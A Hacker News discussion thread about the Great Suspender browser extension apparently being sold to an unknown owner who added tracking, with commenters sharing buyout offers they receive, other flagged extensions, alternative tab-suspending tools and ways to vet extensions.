from Hacker News

I no longer trust The Great Suspender

by davidfstr on 1/20/21, 2:01 PM with 371 comments

  • by fancy_pantser on 1/20/21, 4:28 PM

    As the developer of a pretty popular "utility" browser extension, I've been shocked by the volume of email I get every week about it.

    On a daily basis, I will get requests to sell the extension. Once or twice a week, I will receive an offer to add "a couple lines of code" to my extension which are always generously described as "allowed in the Chrome Web Store" by little fly-by-night organizations that only even have a landing page half the time and usually have throwaway-looking gmail accounts. Out of curiosity, I've asked a few what their code does and they never fully describe it, but it either collects analytics to ship home (my extension runs on all sites, so it's appetizing to them!) or places paid results at the top of any search results, for which I can make "thousands of dollars a month based on the number of North American users I have".

    Here is an example email I received yesterday. It's a good example of how they call it "an SDK" and looks like one of the more legit ones (they registered a domain to send email from, at least).

      We at [redacted] are considering purchasing the complete license and ownership of the extensions which have 50K+ active users, may I know if you would be interested in selling? If so, - what is your estimated price?

  Regarding the SDK monetization which we discussed earlier, as it is not distractive and is compatible with any other monetization. We have straightforward terms and provide support for your users agreement. Our partners generate 3-20 K USD monthly with our solution for the browser extensions.

  As a kind reminder, we are [redacted] — a reputable global peer-to-peer ethical proxy network. All our clients are big reputable companies, we authorize their business before providing any proxy plans. 

  Look forward to your further feedback and discussing further details of our financial proposal for your Software in a short Zoom call or here by emails.
    Finally, I am also hounded by teams at Microsoft and Apple, who want me to port the extension to their new plugin ecosystems so it can be featured/showcased. I worked with Apple on one similar thing for an extension and it caused such a huge jump in support and feature requests from users that I was overwhelmed, so I am not keen to do it again until I have more free time. They can't understand why I don't want to grow by tens of thousands of users a week, but I'm just one person and don't make money from it whatsoever.

  • by bijant on 1/20/21, 2:31 PM

    This is really Google's fault. They make it impossible to turn off automatic updates for Chrome extensions from their store. That would be kind-of-ok if they actually had a rigorous approval process. But they don't. The Chrome Web Store has become one of the prime Vectors for malware. The only way to be safe is to exclusively download releases from the extensions github repo and to manually install them.

  • by kburman on 1/20/21, 3:57 PM

    Here's list of other extensions which have been recently flagged by community for similar behaviour

    - Auto Refresh Premium, static.trckljanalytic.com

    - Stream Video Downloader, static.trckpath.com

    - Custom Feed for Facebook, api.trackized.com

    - Notifications for Instagram, pc.findanalytic.com

    - Flash Video Downloader, static.trackivation.com

    - Ratings Preview for YouTube, cdn.webtraanalytica.com

    Copied from https://github.com/greatsuspender/thegreatsuspender/issues/1...

  • by AlphaWeaver on 1/20/21, 3:01 PM

    Quick note about the workaround mentioned in this article - the suggestion to download the last known good version of the extension and sideload it is a good one, but it has some problems on Chrome.

    Chrome has features to dissuade users from installing extensions from outside the Chrome Web Store. If you load an unpacked extension, Chrome will issue an ominous warning (something like “this extension is untrusted, click here to uninstall”) on every launch.

    One could argue this is for security, but this change was implemented around the same time that Google disabled the ability to self-host extensions that install into Chrome. Really this is a mechanism to shut out independent extension developers from any potential plausible third-party distribution method that doesn’t rely on the Chrome Web Store (which Google controls and aggressively moderates.)

    Use Firefox.

  • by Centigonal on 1/20/21, 2:23 PM

    More discussion on GitHub: https://github.com/greatsuspender/thegreatsuspender/issues/1...

    Quite similar to what happened to Nano Adblocker/Defender a few months ago.

  • by alyandon on 1/20/21, 2:39 PM

    The MS Edge dev channel has a basic form of tab suspending built into it now. Based on my non-rigorous testing it seems to actually save more memory than TGS ever did so I just removed the extension entirely.

    It is really a shame that basic functionality like this isn't built into more browsers and we have to rely on extensions to fill the gaps just to keep memory usage under control for tab-a-holics like myself. :(

  • by imedadel on 1/20/21, 2:54 PM

    I recently switched to Auto Tab Discard.[1] It uses the browser's built-in tab suspending. It doesn't have all the features of TGS, though.

    Edit: OneTab[2] is also pretty good when you have lots of tabs open for research or work.

    [1]: https://github.com/rNeomy/auto-tab-discard

    [2]: https://www.one-tab.com/

  • by Androider on 1/20/21, 4:47 PM

    In Chrome, make sure you set your less frequently used extensions to run "On click" instead of "On all sites". Extensions -> extension details -> Site access.

    For dev tools and such, I set a whitelist of the sites they're allowed to run on, using that same extension details page. There's no need for your JSON formatter etc. to run on every single page you visit. Also speeds up browsing.

  • by brundolf on 1/20/21, 6:58 PM

    Among other things, this is why when people say "HN doesn't need a dark mode, just use an extension", that isn't a valid solution. For years now I've refused to install any extensions that aren't too-big-to-compromise (which in practice - for me - means AdBlock Plus and maybe React Dev Tools), and that should be everyone's policy. Any extension whose compromise wouldn't damage the reputation of a billion-dollar organization is simply too juicy of an attack vector.

  • by jancsika on 1/20/21, 4:04 PM

    > Disable analytics tracking by opening the extension options for The Great Suspender and checking the box “Automatic deactivation of any kind of tracking”.

    > Pray that the shady developer doesn’t issue a malicious update to The Great Suspender later. (There’s no sensible way to disable updates of an individual extension.)

    Does Debian ship packages for individual browser extensions?

    I mean, if they do I'm sure it's not scalable and-- after spending time reading debuild manual-- a giant, archaic pain in the ass.

    On the other hand, all these app delivery systems are so damned pernicious and require constant vigilance. We may have arrived at a moment in time where this is actually a difficult decision:

    * pay somebody a living wage to burrow down into Debian's WoT bureaucracy and add at least a selection of this functionality without phoning home

    * continue playing the most tedious game of whackamole with a whackamole game that mines all our data in order to learn how best to beat all users at whackamole

  • by mkj on 1/20/21, 2:29 PM

    It seems auto-updating browser extensions are riskier than leaving them non-updated?

  • by skrowl on 1/20/21, 3:09 PM

    Just sent him this email:

    Saw your article via HN.

    As an easier permanent fix, just uninstall The Great Suspender and install Auto Tab Discard (https://add0n.com/tab-discard.html). It does the same thing.

    It's available on:

    Firefox - Auto Tab Discard – Get this Extension for Firefox (en-US)(https://addons.mozilla.org/en-US/firefox/addon/auto-tab-disc...)

    Edge - Auto Tab Discard - Microsoft Edge Addons (https://microsoftedge.microsoft.com/addons/detail/auto-tab-d...)

    or even if you're still using Chrome - Auto Tab Discard - Chrome Web Store (https://chrome.google.com/webstore/detail/auto-tab-discard/j...)

  • by asadkn on 1/20/21, 3:04 PM

    I have always used The Great Discarder instead [1]

    It's by the same dev too but it uses Chrome's Native Tab Discarding feature and I found it way more efficient (at the time I started using it a few years ago - haven't compared recently).

    [1] https://chrome.google.com/webstore/detail/the-great-discarde...

  • by AQXt on 1/20/21, 3:27 PM

    > Apparently recent versions of this extension have been taken over by a shady anonymous entity...

    That's something that worries me, whenever I install a software with trusted privileges.

    Software companies can sell their products -- and user base -- to other companies without notice.

    And it can be even worse in the free software world: think about all the updates that happen when you type `apt-get|yum|brew|npm|pip update`. What are the odds of a single dependency being taken over by a shady anonymous entity?

  • by acdha on 1/20/21, 7:11 PM

    This is why I stopped using extensions in any browser years ago unless it came from a trusted company I pay directly (i.e. 1Password). The broken economic model means that the developers always have pressure to cash in on a popular extension and Google has set things up to make abuse fast and easy with automatic silent updates and their usual skimping on human review. By the time the news about TGS came out most users already had the next release installed.

  • by tyingq on 1/20/21, 3:10 PM

    I'm now curious how much money the original developer was paid to hand it over. I imagine he/she knew what the buyer's plan was.

  • by aitchnyu on 1/20/21, 5:51 PM

    Why didnt browsers start warning users when an extension updated after changing owners?

  • by twunde on 1/20/21, 6:37 PM

    For those interested in understanding the security of Chrome extensions, duo introduced CRXcavator (https://crxcavator.io/) a while back, which does some risk scoring around permissions. It is chrome-only, and it doesn't protect against this type of attack specifically, although you can look at the Potential External Communication section for possible issues.

  • by frob on 1/20/21, 5:44 PM

    Google Chrome now has tab grouping. In Beta, you can click on the group name and collapse the tabs. Based on their reload times, it seems chrome suspends the tabs in the background when you collapse the group.

  • by EGreg on 1/20/21, 2:34 PM

    And this is why we need to rethink how we do software distribution.

    Package managers are nice for the lazy, but then we get stuff like this:

    https://qz.com/646467/how-one-programmer-broke-the-internet-...

    Actually you might be pulling a bunch of malicious updates in 2-3 modules deep in your dependency tree anytime.

    As a society we should be moving away from a culture of “immediate” updates eg on Twitter etc. And go towards more “peer review” like in science. Otherwise we are putting responsibility on every individual to verify all sides of the story and get informed. They don’t and society gets more and more dicided. Imagine if a scientist tweeted at 3am and half their followers instantly believed them. Or if an open source contributor’s pull request was instantly accepted and pulled overnight by everyone. That’s why USA and other countries are now so divided politically. Individual responsibility of 100% of the downstream nodes is strange to outsource responsibility to.

    I wrote about this back in 2012 predicting what would happen:

    https://magarshak.com/blog/?p=114

  • by MarioMan on 1/21/21, 5:15 PM

    There was a recent paper published at ACM CCS 2020 that attempts to identify malicious changes to extension updates. Might be worth a read.

    You’ve Changed: Detecting Malicious Browser Extensions through their Update Deltas

    https://dl.acm.org/doi/10.1145/3372297.3423343

  • by asgrdz on 1/21/21, 9:43 AM

    I disable automatic updates for all extensions, as well as personally reviewing the source of every extension before installation.

    The review doesn't take much time. What I look for:

      1. The manifest for what network endpoints the extension is allowed to call.
  2. Any URL in the code that is external to the extension.
  3. Any remote network function (fetch/XHR/links) and traceback to the call sites.
  4. Whether there is any obfuscated code or not.
    If anything found in those spots seems fishy / unclear, I don't install the extension.

    Takes a few minutes, but catches most of the threat vectors. Skimming the code also gives me a sense of what sort of developer is behind the extension. Some code clearly shows a developer cares about privacy and / or security, which unconsciously adds karma for that dev in my book.

    Like others above, I don't use many extensions, but those I use I have to trust.

  • by weakboi on 1/20/21, 5:06 PM

    Ironically, I tracked the real world identity of someone using stolen credit cards in my ecom site BECAUSE he posted a tutorial/how-to on YouTube showing the vulnerability tool (script kiddie), under his real name. SMH. This won't stop this information from being disseminated, but it may save some idiots from themselves.

  • by qwerty456127 on 1/20/21, 4:40 PM

    By the way, is there an extension (I'm interested in both Firefox and Chrome) which would force all the new (background) tabs to be created in the suspended state (like if you had opened them in background and then restarted the browser) and only start loading after you actually open them?

  • by dstick on 1/20/21, 7:54 PM

    More detailed information can be found here: https://github.com/greatsuspender/thegreatsuspender/issues/1...

  • by SiteRelEnby on 1/20/21, 2:33 PM

    Either the second or third time it lost all my tabs was when I stopped trusting it.

  • by orliesaurus on 1/20/21, 4:03 PM

    Lifehack: export your suspended tabs as a flat file through the interface, uninstall the add on, then follow the downgrade as the blog suggests, at the end reimport your tabs from the flat file

  • by Aardwolf on 1/20/21, 2:42 PM

    Doesn't chrome already suspend background tabs without plugin? At least I'm unable to properly have browser games running unless they're in a visible tab.

  • by mtoddsmith on 1/20/21, 4:39 PM

    Seems there should be an extension which checks other extensions for nefarious activity or notifies you of the events that are mentioned in the article.

  • by StellarTabi on 1/20/21, 7:47 PM

    The lack of user control, lock files, granularity of controls over browser extensions has gone too far.

  • by nojito on 1/20/21, 3:56 PM

  • by albertgoeswoof on 1/20/21, 3:01 PM

    Or you can use https://www.one-tab.com/ or https://tab.bz for a similar-ish use case

  • by facorreia on 1/20/21, 10:24 PM

    That's why I don't trust Chrome extensions. There have been too many instances of a popular instance being taken over to run malware. I don't think Google's handling of these security issues has been adequate.

  • by nakodari on 1/20/21, 2:51 PM

    Thanks for this! I've been using this extension for a long time and just removed it today. Honestly, with Macbook Air M1 there is no need for suspending tabs any more because the battery life is amazing, so that also helps.

  • by bogomipz on 1/21/21, 4:13 AM

    Did anyone Download the latest good version of The Great Suspender7.1.6) from GitHub and load it as an unpacked extension per the article?

    Are there any potential downsides to this? I was also curious how does loading this format avoid updates?

  • by wintermutestwin on 1/20/21, 3:47 PM

    At this point, I would gladly pay good money for a browser that prevented ads and tracking, provided most of the standard plugin functionality oob and vetted the rest. This whole mess is a massive time suck.

  • by jonas_kgomo on 1/21/21, 1:55 AM

    I've been using Sidekick,it has done a lot for me in terms of substituting extensions like TGS, It has its own tool for tab grouping and sessions, plus adblock. It has been good for productivity

  • by jakobpb on 1/20/21, 6:54 PM

    Uh, just use Firefox. Problem solved for both functionality and security.

  • by mikhailfranco on 1/22/21, 2:53 AM

    Looks like the 'last known good' version 7.1.6 is now blocked by the TGS server.

    Workaround to reopen a page is just to cut'n'paste the original URL from a parameter at the end of the TGS URL.

  • by vmception on 1/20/21, 3:26 PM

    Uninstalled and reported.

  • by AlexCoventry on 1/20/21, 5:12 PM

    Is there a tool which will automatically reload all your extensions from disk, as described in the OP? Seems like a sensible default, from a security perspective.

  • by TheRealPomax on 1/20/21, 3:58 PM

    Is there a reason this extension still exists, given that tabs get heavily deprioritized when not in focus, and have been for many, many versions now?

  • by mendelmaleh on 1/20/21, 4:29 PM

    I expected this to be about Jack Dorsey/twitter xD

  • by Paul-ish on 1/20/21, 6:58 PM

    I keep most of my extensions disabled most of the time. A lot of the extensions have particular uses and don't always need to be active.

  • by lanius on 1/20/21, 11:52 PM

    I'm glad I decided to go with 32 GB of RAM for my current PC build. No longer need to close any tabs!

  • by peanut_worm on 1/20/21, 2:50 PM

    Why do people keep 100s of tabs open at a time? I get irritated if I have more than 8 open.

  • by jeromeparadis on 1/20/21, 6:47 PM

    There's a reason why I don't install any extension except a password manager.

  • by MacroChip on 1/20/21, 8:27 PM

    Does this extension add functionality beyond Chrome's existing tab suspension?

  • by pjmlp on 1/20/21, 8:28 PM

    I just don't use extensions, so no need to worry about such scenarios.

  • by bugfix on 1/20/21, 6:08 PM

    Wow, my Chrome RAM usage went from about 2GB to 8GB after removing TGS.

  • by otterpro on 1/20/21, 3:23 PM

    Wow, this is why just recently my Macbook pro was registering high CPU usage even when all tabs were asleep using Great Suspender. For some reason, Chrome was registering high CPU usage, and I thought it was some Chrome bug.

  • by cwwc on 1/20/21, 3:17 PM

    Lifesaver. Much obliged, davidfstr.

  • by istorical on 1/20/21, 3:26 PM

    anyone able to compare Tiny Suspender and Auto Tab Discard?

  • by angryasian on 1/20/21, 9:11 PM

    there really needs to be a better bookmarking solution.

  • by iamspoilt on 1/20/21, 4:26 PM

    Uninstalled. Period.

  • by tra3 on 1/20/21, 2:50 PM

    A reddit link, from the blog post [0] has all the details for those who don't use chrome.

    TLDR: A popular extension was quietly sold off to an unknown party that subsequently added tracking/analytics. Not specifically malware, but not trustworthy either.

    Did I miss anything?

    [0]: https://www.reddit.com/r/KyleTaylor/comments/jowlt2/open_sou...

  • by tus88 on 1/20/21, 6:22 PM

    "Shady" take-over of plugins/apps is just a big a suspicious fail as allowing apps to gain access to all contacts on mobile phones.

    Google never really cared about user privacy at all.